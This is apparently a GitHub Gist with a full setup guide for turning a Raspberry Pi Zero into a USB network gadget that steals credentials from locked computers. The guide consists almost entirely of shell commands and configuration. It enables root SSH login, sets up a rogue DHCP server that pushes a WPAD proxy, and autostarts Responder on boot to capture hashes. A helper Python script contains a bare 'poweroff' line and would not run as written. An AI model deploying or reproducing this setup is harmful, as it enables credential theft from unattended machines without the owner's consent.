Last active
December 1, 2021 11:58
-
-
Save milo2012/1c638b19b61c1338e21bad23705ff8fb to your computer and use it in GitHub Desktop.
Snagging creds from locked machines (for Raspberry Pi Zero)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
##An update to Snagging Creds From Locked Machines from https://room362.com/post/2016/snagging-creds-from-locked-machines/. | |
##Installation on Rasberry Pi Zero | |
##Download Raspbian Jessie Lite from https://www.raspberrypi.org/downloads/raspbian/ | |
##Use Pi Filler and write image to MicroSD | |
##Follow Step 1) in https://learn.adafruit.com/turning-your-raspberry-pi-zero-into-a-usb-gadget/ethernet-gadget to let the Raspberry Pi Zero device emulates as a USB NIC | |
$ cd /pentest | |
$ apt-get install -y python git python-pip python-dev screen sqlite3 | |
$ pip install pycrypto | |
$ git clone https://github.com/lgandx/Responder | |
$ apt-get install inotify-tools | |
$ aptitude -y install isc-dhcp-server | |
##Change PermitRootLogin value to 'Yes' | |
$ nano /etc/ssh/sshd_config | |
PermitRootLogin yes | |
$ nano /etc/network/interfaces | |
auto usb0 | |
allow-hotplug usb0 | |
iface usb0 inet static | |
address 192.168.2.201 | |
netmask 255.255.255.0 | |
gateway 192.168.2.1 | |
$ nano /etc/dhcp/dhcpd.conf | |
ddns-update-style none; | |
option domain-name "domain.local"; | |
option domain-name-servers 192.168.2.201; | |
default-lease-time 60; | |
max-lease-time 72; | |
authoritative; | |
log-facility local7; | |
option local-proxy-config code 252 = text; | |
subnet 192.168.2.0 netmask 255.255.255.0 { | |
range 192.168.2.1 192.168.2.2; | |
option routers 192.168.2.201; | |
option local-proxy-config "http://192.168.2.201/wpad.dat"; | |
} | |
$ /etc/init.d/dhcpcd restart | |
$ nano /etc/rc.local | |
#!/bin/sh -e | |
rm -f /var/lib/dhcp/dhcpd.leases | |
touch /var/lib/dhcp/dhcpd.leases | |
/usr/sbin/dhcpd | |
/usr/bin/screen -dmS responder bash -c 'cd /pentest/Responder/; python Responder.py -I usb0 -f -w -r -d -F -P' | |
/usr/bin/screen -dmS notify bash -c 'while inotifywait -e modify /pentest/Responder/Responder.db; do poweroff; done' | |
#/usr/bin/screen -dmS checkStatus bash -c 'cd /pentest; python checkStatus.py' | |
exit 0 | |
$ nano /root/.screenrc | |
# Logging | |
deflog on | |
logfile /root/logs/screenlog_$USER_.%H.%n.%Y%m%d-%0c:%s.%t.log | |
$ nano /pentest/checkStatus.py | |
import os | |
import glob | |
import time | |
while True: | |
fileList=glob.glob('/pentest/Responder/logs/*.txt') | |
if len(fileList)>0: | |
cmd = "echo 1 | sudo tee /sys/class/leds/led0/brightness" | |
os.system(cmd) | |
poweroff | |
else: | |
cmd = "echo 0 | sudo tee /sys/class/leds/led0/brightness" | |
os.system(cmd) | |
time.sleep(1) | |
##Plug the Raspberry Pi Zero device to the laptop using the Micro USB cable. | |
##Responder will attempt to capture the credentials | |
##The LED on Raspberry Pi turns off when credentials are captured. | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment